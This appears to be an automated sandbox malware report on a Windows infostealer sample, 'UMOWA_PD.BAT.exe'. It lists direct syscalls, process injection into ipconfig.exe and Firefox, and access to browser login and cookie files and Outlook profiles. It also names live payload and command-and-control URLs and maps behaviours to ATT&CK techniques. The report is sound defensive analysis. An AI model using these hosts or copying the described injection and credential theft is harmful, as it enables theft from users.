        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtAllocateVirtualMemory: Direct from: 0x773C480C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtWriteVirtualMemory: Direct from: 0x773C482C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtProtectVirtualMemory: Direct from: 0x773C2EBC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtQueryInformationProcess: Direct from: 0x773C2B46
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtResumeThread: Direct from: 0x773C2EDC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtCreateUserProcess: Direct from: 0x773C363C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtOpenKeyEx: Direct from: 0x773C2ABC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtSetInformationThread: Direct from: 0x773C2A6C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtQueryAttributesFile: Direct from: 0x773C2D8C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtClose: Direct from: 0x773C2A8C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtCreateKey: Direct from: 0x773C2B8C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtProtectVirtualMemory: Direct from: 0x773B7A4E
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtCreateFile: Direct from: 0x773C2F0C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtQueryVolumeInformationFile: Direct from: 0x773C2E4C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtDeviceIoControlFile: Direct from: 0x773C2A0C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtAllocateVirtualMemory: Direct from: 0x773C2B0C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtOpenSection: Direct from: 0x773C2D2C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtQuerySystemInformation: Direct from: 0x773C47EC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtOpenFile: Direct from: 0x773C2CEC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtReadVirtualMemory: Direct from: 0x773C2DAC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtAllocateVirtualMemory: Direct from: 0x773C3BBC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtQueryInformationToken: Direct from: 0x773C2BCC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtNotifyChangeKey: Direct from: 0x773C3B4C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtSetInformationProcess: Direct from: 0x773C2B7C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtSetInformationThread: Direct from: 0x773B6319
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtReadFile: Direct from: 0x773C29FC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtQuerySystemInformation: Direct from: 0x773C2D1C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtAllocateVirtualMemory: Direct from: 0x773C2B1C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtResumeThread: Direct from: 0x773C35CC
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtWriteVirtualMemory: Direct from: 0x773C2D5C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtMapViewOfSection: Direct from: 0x773C2C3C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe NtDelayExecution: Direct from: 0x773C2CFC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exe Section loaded: NULL target: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exe Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe protection: read write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 2368
        Source: C:\Windows\SysWOW64\ipconfig.exe Thread APC queued: target process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exe Process created: C:\Users\user\Desktop\UMOWA_PD.BAT.exe "C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: giLTwJlyLWpfb.exe, 00000003.00000000.15313054859.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000002.19981330723.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000000.15454179747.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: giLTwJlyLWpfb.exe, 00000003.00000000.15313054859.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000002.19981330723.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000000.15454179747.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: giLTwJlyLWpfb.exe, 00000003.00000000.15313054859.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000002.19981330723.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000000.15454179747.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: giLTwJlyLWpfb.exe, 00000003.00000000.15313054859.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000002.19981330723.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000000.15454179747.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: pProgram ManagerOSg
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

        Stealing of Sensitive Information

        Source: Yara match File source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match File source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        1
        OS Credential Dumping
        121
        Security Software Discovery
        Remote Services1
        Email Collection
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection
        2
        Virtualization/Sandbox Evasion
        LSASS Memory2
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism
        1
        Access Token Manipulation
        Security Account Manager2
        Process Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading
        312
        Process Injection
        NTDS1
        Application Window Discovery
        Distributed Component Object Model1
        Clipboard Data
        5
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets1
        System Network Configuration Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism
        Cached Domain Credentials2
        File and Directory Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information
        DCSync14
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        [Behavior graph omitted. Behavior Graph ID: 1517964, Sample: UMOWA_PD.BAT.exe, Startdate: 25/09/2024, Architecture: WINDOWS, Score: 100]

        No Antivirus matches
        Source  Detection  Scanner  Label  Link
        C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll  0%  ReversingLabs
        No Antivirus matches
        No Antivirus matches
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://bestpack.ee/POL.binfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.dhkatp.vip/yyvd/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.invicta.world/tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.whats-in-the-box.org/bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o=true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.linkwave.cloud/was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.komart.shop/qwk1/?Xb3xI=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.platinumkitchens.info/qo4k/?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.dhkatp.vip/yyvd/?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.linkwave.cloud/was5/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.dxeg.lol/ytua/true
                                                                • Avira URL Cloud: safe
                                                                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.ico-11EqE.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.inastra.online/px.js?ch=2ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.inastra.online/px.js?ch=1ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdffirefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ac.ecosia.org/autocomplete?q=ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://bestpack.ee/POL.binNyUMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://bestpack.ee/POL.binV~UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/js/min.js?v2.3ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdUMOWA_PD.BAT.exe, 00000002.00000001.15100533752.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1517964
                                                                Start date and time:2024-09-25 09:51:49 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 18m 4s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                Run name:Suspected Instruction Hammering
                                                                Number of analysed new started processes analysed:5
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Sample name:UMOWA_PD.BAT.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/10@17/12
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 73%
                                                                • Number of executed functions: 78
                                                                • Number of non-executed functions: 289
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Exclude process from analysis (whitelisted): dllhost.exe
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: UMOWA_PD.BAT.exe
                                                                Time:03:55:19
                                                                Type:API Interceptor
                                                                Description:29200159x Sleep call for process: ipconfig.exe modified
                                                                                  Process:C:\Windows\SysWOW64\ipconfig.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):135168
                                                                                  Entropy (8bit):1.1142956103012707
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                  MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                  SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                  SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                  SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):5.805604762622714
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                                  MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                                  SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                                  SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                                  SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Payment_Advice.1.bat.exe, Detection: malicious
                                                                                  • Filename: Payment_Advice..exe, Detection: malicious
                                                                                  • Filename: Payment_Advice..exe, Detection: malicious
                                                                                  • Filename: Payment_Advice.1.bat.exe, Detection: malicious
                                                                                  • Filename: Payment_Advice..exe, Detection: malicious
                                                                                  • Filename: Payment_Advice..exe, Detection: malicious
                                                                                  • Filename: Overdoers.exe, Detection: malicious
                                                                                  • Filename: Pedido_52038923_CotizacionS_max2024.bat.exe, Detection: malicious
                                                                                  • Filename: Overdoers.exe, Detection: malicious
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):344382
                                                                                  Entropy (8bit):7.669127467049569
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:LjRPmJ8vp6qywQKuKSvsdSSAtqpBztRTTMBKzIu9zTtydYcK/IxWYnzRXiCC2iIp:NYwbuXvxSWqpzOBs99zT4BK/zEzZin/Y
                                                                                  MD5:F07B877AE12AFE19923F01C5B44F678C
                                                                                  SHA1:2303FC8AE533C0408181FACBB76F28D8B01C4527
                                                                                  SHA-256:4D00FF4C230B12DA24BEC1D43EAB04CA5EE5E98C2AE8E965430800FB265094D6
                                                                                  SHA-512:E0451CC014AEB2A42220FB2A186FB6F72D8250055C328C7AB3724D7D647B9BB765C286440611733525129638FD5074DDEEA548FA689D2FA89151C7BC17FC5549
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):97664
                                                                                  Entropy (8bit):1.2371741628878217
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:XEFQJPKWWG5ARWTJqBshVmdboj6UJY3VBCwYw2ZDRnv+mRQN:XUE/m2O3N
                                                                                  MD5:2B4D5FD79400969869ED030F4803BE99
